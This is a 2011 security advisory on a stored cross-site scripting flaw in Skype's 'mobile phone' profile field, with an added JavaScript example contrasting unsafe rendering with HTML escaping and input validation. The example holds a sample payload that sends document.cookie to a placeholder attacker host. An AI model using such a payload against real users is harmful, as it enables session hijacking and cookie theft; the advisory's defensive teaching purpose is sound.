
T-670: Skype Input Validation Flaw in 'mobile phone' Profile Entry Permits Cross-Site Scripting Attacks

July 18, 2011 - 7:09am


PROBLEM:

A vulnerability was reported in Skype. A remote user can conduct cross-site scripting attacks.

PLATFORM:

5.3.0.120 and prior versions

ABSTRACT:

The software does not properly filter HTML code from user-supplied input in the "mobile phone" profile entry before displaying it to other users.

REFERENCE LINKS:

SecurityTracker Alert ID: 1025789
Skype Security Advisory
KoreSecure News
H Security ID: 1279864

IMPACT ASSESSMENT:

High

Discussion:

Skype suffers from a persistent (stored) cross-site scripting vulnerability due to a lack of input validation and output sanitization of the "mobile phone" profile entry. Other input fields may also be affected.

The software does not properly filter HTML code from user-supplied input in the "mobile phone" profile entry before displaying it. A remote user can therefore cause arbitrary script code to be executed by the target user's browser component. The code will originate from the Skype software and will run in the security context of that application. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the application, access data recently submitted by the target user to the application via web form, or take actions on the application as the target user.

Impact:

An attacker could trivially hijack the session IDs of remote users and use the resulting script execution as a stepping stone toward the underlying Skype client software and the victim's operating system.

There is a cross-site scripting (XSS) vulnerability in the Skype Home area of the Skype for Windows client. An attacker can embed JavaScript in the mobile phone field of their own profile. Skype fails to adequately filter this field, so when one of the attacker's contacts logs into Skype, the embedded JavaScript is executed automatically without further user interaction. An attacker could exploit this to retrieve the victim's session cookie.
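The defect described above is a missing output-encoding step (and, secondarily, a missing input check) on a profile field that is later rendered into HTML. The following example, added here for illustration and not code from Skype or from the advisory, shows the vulnerable rendering pattern next to its hardened form. The renderer, the contact objects, the phone-number rule and the attacker.example host are all constructed for the example; only the "mobile phone" field name comes from the advisory.

```javascript
// Added example (not Skype's code): a profile field rendered into an HTML
// view without encoding, beside the two defenses the advisory says were
// missing: output sanitization and input validation.

// Output encoding: neutralize the characters that are significant in HTML
// text and attribute contexts.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Input validation: a mobile number needs only a leading '+', digits and
// common separators. Anything else is rejected when the profile is saved.
// (Hypothetical rule for the example, not Skype's.)
const PHONE_RE = /^\+?[0-9][0-9 ().-]{2,30}$/;
function isValidMobilePhone(value) {
  return PHONE_RE.test(String(value));
}

// Vulnerable pattern: the raw field value is concatenated into markup, so a
// contact who puts markup in the field has it rendered as markup.
function renderProfileUnsafe(profile) {
  return `<div class="contact"><span class="name">${profile.name}</span>` +
         `<span class="mobile">${profile.mobilePhone}</span></div>`;
}

// Hardened pattern: every untrusted value is encoded for the HTML context it
// lands in, so the same input renders as visible text rather than as a tag.
function renderProfileSafe(profile) {
  return `<div class="contact"><span class="name">${escapeHtml(profile.name)}</span>` +
         `<span class="mobile">${escapeHtml(profile.mobilePhone)}</span></div>`;
}

// Constructed sample data: one contact whose "mobile phone" field carries a
// script that sends document.cookie to an attacker-controlled host
// (attacker.example is a placeholder), and one ordinary contact.
const MALICIOUS_CONTACT = {
  name: 'Mallory',
  mobilePhone: "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>",
};
const BENIGN_CONTACT = { name: 'Alice', mobilePhone: '+1 (555) 010-2345' };

// Run both renderers and both checks; returns the outcomes so they can be
// inspected or asserted on.
function demo() {
  return {
    unsafeHasScript: /<script>/.test(renderProfileUnsafe(MALICIOUS_CONTACT)),
    safeHasScript: /<script>/.test(renderProfileSafe(MALICIOUS_CONTACT)),
    maliciousAccepted: isValidMobilePhone(MALICIOUS_CONTACT.mobilePhone),
    benignAccepted: isValidMobilePhone(BENIGN_CONTACT.mobilePhone),
  };
}

console.log(JSON.stringify(demo()));
```

Output encoding is the control that actually closes the hole: validation on the phone field blocks this particular payload, but the advisory notes that other fields may be affected, and a free-text field such as a display name cannot be constrained the same way. Encode at the point of rendering regardless of what validation ran at submission time.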

Solution:

Skype 5.3.0.120 (the current version) and earlier for Windows and Mac are affected. The Linux version is not affected.

Skype has confirmed it is aware of the vulnerability and has already developed a patch to be published within the next week. Skype also gives a plausible explanation of why the problem is not immediately reproducible: to take advantage of it, the attacker must appear in the victim's list of frequent contacts.
